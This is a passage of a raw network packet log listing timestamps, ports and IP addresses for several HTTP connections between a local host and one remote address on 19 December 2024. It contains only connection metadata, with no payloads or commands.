Dec 19, 2024 08:52:39.361748934 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.361877918 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.362070084 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.362871885 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.362993002 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.363095999 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.364044905 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.364120007 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.364260912 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.365108967 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.365233898 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.365338087 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.366225004 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.366338968 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.366390944 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.367444038 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.367567062 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.367614031 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.368473053 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.368571997 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.369096994 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.369579077 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.369697094 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.369748116 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.370697975 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.370800972 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.370881081 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.371803045 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.371922970 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.372335911 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.372940063 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.373115063 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.373219967 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.374041080 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.374130011 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.374569893 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.375154972 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.375308037 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.375349045 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.376270056 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.376382113 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.376538992 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.377408028 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.377496004 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.377759933 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.378490925 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.378675938 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.378720045 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.379673004 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.379837036 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.379940033 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.380743027 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.380845070 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.381064892 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.381846905 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.381963968 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.382098913 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.382952929 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.383079052 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.383207083 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.384191990 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.384301901 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.384315014 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.384356022 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.384393930 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.384694099 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.384793043 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.384897947 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.385032892 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.385271072 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.385395050 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.385445118 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.385668039 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.385679960 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.385716915 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.386234999 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.386344910 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.386394978 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.386554003 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.386573076 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.386614084 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.387089014 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.387134075 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.387190104 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.387415886 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.387610912 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.387659073 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.387892962 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.387955904 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.388120890 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.388539076 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.388636112 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.388927937 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.388972998 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.388972998 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.389137983 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.389625072 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.389662981 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.389770031 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.389782906 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.390206099 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.390522003 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.390574932 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.390574932 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.390621901 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.390837908 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.391092062 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.391138077 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.391369104 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.391529083 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.391583920 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.391926050 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.392128944 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.392317057 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.392368078 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.392368078 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.392489910 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.392992020 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.393119097 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.393228054 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.393362045 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.393373966 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.393409014 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.393919945 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.394078016 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.394119024 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.394268990 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.394282103 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.394320965 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.394783974 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.394886017 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.394932032 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.395252943 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.395385027 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.395431995 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.395646095 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.395816088 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.395858049 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.396379948 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.396487951 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.396737099 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.396750927 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.396785975 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.396950006 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.397356033 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.397403002 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.397511959 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.397524118 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.398000002 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.398252964 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.398300886 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.398300886 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.398359060 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.398596048 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.398783922 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.398832083 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.399059057 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.399100065 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.399276972 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.399678946 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.399797916 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.399843931 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.400026083 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.400317907 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.400361061 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.400810957 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.400859118 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.400935888 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.400948048 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.401365042 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.401662111 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.401711941 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.401711941 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.401777029 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.402028084 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.402221918 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.402513027 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.402563095 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.402563095 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.402651072 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.403027058 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.403137922 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.403183937 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.403332949 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.403438091 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.403660059 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.404148102 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.404264927 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.404298067 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.404318094 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.404351950 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.404745102 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.405097008 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.405184031 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.405201912 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.405447006 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.405642986 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.405843019 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.405988932 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.406080961 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.406099081 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.406409979 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.406503916 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.406544924 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.406887054 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.406959057 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.407001972 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.407532930 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.407671928 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.407886982 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.407897949 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.407931089 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.408205032 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.408560991 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.408617020 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.408695936 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.408709049 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.409075975 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.409441948 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.409533978 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.409578085 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.409578085 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.410252094 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.410370111 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.410410881 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.411123991 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.411171913 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.411220074 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.411990881 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.412030935 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.412060022 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.412870884 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.412925005 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.412972927 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.413685083 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.413752079 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.413815975 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.414573908 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.414657116 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.414705038 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.454644918 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.467258930 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.467274904 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.467345953 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.467540026 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.467700005 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.468322992 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.468601942 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.468687057 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.468808889 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.469556093 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.469731092 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.469928026 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.470607042 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.470724106 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.470887899 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.471645117 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.471750021 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.472476006 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.472613096 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.472727060 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.473619938 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.473644972 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.473740101 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.473778009 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.474637032 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.474756002 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.474796057 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.475713015 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.475838900 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.475883007 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.476661921 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.476793051 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.476902962 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.477675915 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.477797985 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.478066921 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.478683949 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.478802919 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.478840113 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.479859114 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.479943991 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.479979992 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.480689049 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.480811119 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.480936050 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.481707096 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.481798887 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.481849909 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.482798100 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.482887030 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.482929945 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.483728886 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.483849049 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.484081984 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.484741926 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.484882116 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.484925985 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.485735893 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.485850096 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.486126900 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.486784935 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.486862898 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.486999035 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.488154888 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.488282919 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.488363981 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.488795042 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.488915920 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.489022017 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.489804983 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.489916086 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.490111113 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.490839958 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.490943909 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.491198063 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.491913080 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.491945982 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.491982937 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.492415905 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.492527962 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.492640018 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.493423939 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.493520975 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.493642092 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.494432926 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.494548082 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.494668961 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.495476961 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.495626926 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.495863914 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.496498108 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.496613979 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.496655941 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.497505903 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.497627974 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.497670889 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:39.498501062 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.498620033 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:39.499104023 CET	49731	80	192.168.2.4	147.45.47.15
